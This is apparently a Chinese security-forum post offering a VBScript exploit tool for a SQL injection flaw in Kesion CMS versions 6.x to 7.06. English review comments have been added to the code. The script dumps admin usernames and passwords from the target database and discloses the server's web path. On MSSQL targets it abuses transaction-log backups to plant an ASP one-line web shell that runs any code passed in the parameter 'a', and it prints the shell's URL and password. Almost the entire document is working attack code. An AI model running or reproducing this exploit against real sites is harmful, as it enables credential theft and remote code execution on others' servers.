提供个工具吧,在mssql显错模式下可以直接获得webshell: http://hi.baidu.com/netjacker/blog/item/05f9802c459ee92e359bf715.html

科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具:

'*=========================================================================
'* Intro   科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具
'* Usage   在命令提示符下输入:Cscript.exe Exp.vbs www.target.com
'* Author  雨中风铃
'* WEB     http://hi.baidu.com/yanfei6
'*=========================================================================

Function PostData(PostUrl)
    ' Fetch PostUrl with a synchronous HTTP GET (msxml2.serverXMLHTTP) and
    ' return the response body as text. Despite the name no POST body is sent.
    ' There is no error handling: a transport failure raises a runtime error,
    ' and a non-200 status is not checked (the caller gets whatever body the
    ' server returned). Sleeps 2 seconds after every request; the original
    ' gives no reason, presumably to pace requests against the target.
    Dim objHttp
    Set objHttp = CreateObject("msxml2.serverXMLHTTP")
    objHttp.Open "GET", PostUrl, False
    objHttp.Send
    PostData = objHttp.ResponseText
    Set objHttp = Nothing
    WScript.Sleep 2000
End Function

Function BackDB(PostUrl)
    ' Send one GET request for PostUrl and echo "[ status statusText ] url".
    ' The URL is unescaped twice for display because Encode() double-encodes
    ' the payload (%25xx). If the status is not 200 the whole script is
    ' terminated with an error message (no value is returned either way).
    ' Sleeps 2 seconds after the request, like PostData.
    Dim objHttp, nStatus
    Set objHttp = CreateObject("msxml2.serverXMLHTTP")
    objHttp.Open "GET", PostUrl, False
    objHttp.Send
    nStatus = objHttp.Status
    WScript.Echo "[ " & nStatus & " " & objHttp.statusText & " ] " & Unescape(Unescape(PostUrl))
    If nStatus <> 200 Then
        WScript.Echo "日志差异备份出错!"
        WScript.Quit
    End If
    Set objHttp = Nothing
    WScript.Sleep 2000
End Function

Function IsSuccess(PostUrl, strSign)
    ' Fetch PostUrl through PostData and report whether the response body
    ' contains the marker strSign (InStr, case-sensitive).
    ' Returns True when the marker is found, False otherwise.
    Dim strBody
    strBody = PostData(PostUrl)
    IsSuccess = (InStr(strBody, strSign) > 0)
End Function

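Function Encode(strData)
    ' Double URL-encode strData for use in a query string: every character
    ' becomes "%25" followed by two hex digits ("%25" is a literal "%", so the
    ' web server's first decode yields "%41", "%20", ...), and a double-encoded
    ' NUL ("%2500") is appended. The second decode is expected to happen inside
    ' the target application; this routine cannot verify that.
    '
    ' Fix: Hex() returns a single digit for code points below 16, which the
    ' original emitted as e.g. "%259" -- not a valid escape once decoded. Such
    ' values are now padded to two digits. Characters whose Asc() exceeds 255
    ' (DBCS) still produce a four-digit value exactly as before; the routine is
    ' only correct for single-byte characters.
    '
    ' strData: the raw string to encode (may be empty).
    ' Returns: the encoded string, always ending in "%2500".
    Dim strOut, nPos, strHex
    For nPos = 1 To Len(strData)
        strHex = Hex(Asc(Mid(strData, nPos, 1)))
        If Len(strHex) = 1 Then strHex = "0" & strHex
        strOut = strOut & "%25" & strHex
    Next
    Encode = strOut & "%2500"
End Function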

Function getData(strData, patrn)
    ' Run the regular expression patrn (case-insensitive, global) over strData
    ' and return the first capture group of every match, each one prefixed
    ' with vbCrLf. patrn must contain at least one capture group because
    ' SubMatches(0) is read for every match.
    ' Returns Empty (which compares equal to "") when nothing matched.
    Dim objRe, objMatches, objMatch, strOut
    Set objRe = New RegExp
    With objRe
        .Pattern = patrn
        .IgnoreCase = True
        .Global = True
    End With
    Set objMatches = objRe.Execute(strData)
    For Each objMatch In objMatches
        If objMatch.Value <> "" Then
            strOut = strOut & vbCrLf & objMatch.SubMatches(0)
        End If
    Next
    getData = strOut
End Function

' ---------------------------------------------------------------------------
' Script body. Exactly one argument: the base URL of the target site.
' NOTE(review): everything below sends requests to a third-party host and, in
' the MSSQL branch, changes the database recovery model and writes files on
' the server. Run it only against systems you are authorised to test.
' ---------------------------------------------------------------------------
If WScript.Arguments.Count <> 1 Then
    WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的网址"
    WScript.Echo "Example: Cscript.exe Exp.vbs http://www.kesion.com/"
    WScript.Quit
End If

' Normalise the base URL: backslashes become slashes and a trailing "/" is
' guaranteed so relative paths can be appended directly.
attackUrl = WScript.Arguments(0)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If

' Injection point: the "province" parameter of regajax.asp?action=getcityoption.
' Every payload below is appended to this URL after Encode() (double encoding).
strHoleUrl = attackUrl & "user/reg/regajax.asp?action=getcityoption&province="
' Probe 1: UNION in a marker string from KS_Admin. The target is treated as
' vulnerable when the marker comes back in the response body.
strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole' From KS_Admin")
If IsSuccess(strTestUrl, "ExistHole") Then
    WScript.Echo "恭喜!存在漏洞"
Else
    WScript.Echo "没有检测到漏洞"
    WScript.Quit
End If

' Probe 2: the same UNION without a FROM clause. Success is reported as
' "MSSQL", failure as "ACCESS" (presumably because Jet SQL rejects a
' FROM-less SELECT; the script does not explain the heuristic).
strTestUrl = strHoleUrl & Encode("' union Select 1, 'ExistHole'")
If IsSuccess(strTestUrl, "ExistHole") Then
    WScript.Echo "数据库为:MSSQL"
    bAccess = False
Else
    WScript.Echo "数据库为:ACCESS"
    bAccess = True
End If

' Dump up to 10 rows of KS_Admin as "UserName<->PassWord". The regex assumes
' the injected column is rendered into value="..." attributes of the response.
strTestUrl = strHoleUrl & Encode("' union Select top 10 AdminID,UserName+'<->'+PassWord From KS_Admin")
WScript.Echo "用户名<->密码:" & getData(PostData(strTestUrl), "value=""([^""]+)")

' Path disclosure: send a bare "%i" (an invalid escape after one decode) and
' scrape whatever precedes "../../KS_Cls/Kesion.EscapeCls.asp" in the resulting
' page -- presumably an error message naming the script's physical directory.
strTestUrl = strHoleUrl & "%25i"
strWebPath = getData(PostData(strTestUrl), ">([^>]+)\.\./\.\./KS_Cls/Kesion\.EscapeCls\.asp")
strWebPath = Replace(strWebPath, vbCrLf, "")
If strWebPath <> "" Then
    WScript.Echo "网站绝对路径:" & strWebPath
End If

' MSSQL only: read the current database name via db_name().
' In the Access case strDatabase is never assigned (Empty), and Empty <> ""
' evaluates to False, which is what disables the backup block below.
If Not bAccess Then
    strTestUrl = strHoleUrl & Encode("' union Select 1, db_name()")
    strDatabase = getData(PostData(strTestUrl), "value=""([^""]+)")
    strDatabase = Replace(strDatabase, vbCrLf, "")
    WScript.Echo "MSSQL数据库名为:" & strDatabase
End If

' Log-backup file write (the "differential backup" technique). The statement
' order matters:
'   1. switch the database to FULL recovery (presumably so log backups work);
'   2. create a scratch table with an image column;
'   3. initial log backup (WITH INIT) to c:\cmd on the database server;
'   4. insert the payload -- the hex literal is the bytes of
'      <%execute(request("a"))%>, an ASP page that executes whatever is passed
'      in request parameter "a" (hence "密码为:a" below);
'   5. second log backup written into the web directory as 2.asp, so the
'      payload bytes end up inside a file the web server will serve;
'   6./7. drop the scratch table and switch recovery back to SIMPLE.
' BackDB aborts the script on any non-200 status, so a failure midway can leave
' the database in FULL recovery with the table in place. c:\cmd is never
' removed, and step 7 forces SIMPLE regardless of the original model.
WScript.Echo "正在进行数据库差异备份:"
If strWebPath <> "" And strDatabase <> "" Then
    BackDB(strHoleUrl & Encode("';alter database " & strDatabase & " set RECOVERY FULL"))
    BackDB(strHoleUrl & Encode("';create table cmd (a image)"))
    BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = 'c:\cmd' with init"))
    BackDB(strHoleUrl & Encode("';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)"))
    BackDB(strHoleUrl & Encode("';backup log " & strDatabase & " to disk = '" & strWebPath & "2.asp'"))
    BackDB(strHoleUrl & Encode("';drop table cmd"))
    BackDB(strHoleUrl & Encode("';alter database "& strDatabase & " set RECOVERY SIMPLE"))
End If
' NOTE(review): these two lines print even when the block above was skipped
' (Access target, or no path / database name recovered), so the reported URL
' may not exist. They also assume strWebPath is the physical directory of
' user/reg/, which only holds if the scraped error page named that directory.
' The written page has no authentication beyond knowing the parameter name,
' so anyone who finds 2.asp gets code execution on the target.
WScript.Echo "Execute一句话木马地址为:" & attackUrl & "user/reg/2.asp"
WScript.Echo "密码为:a"
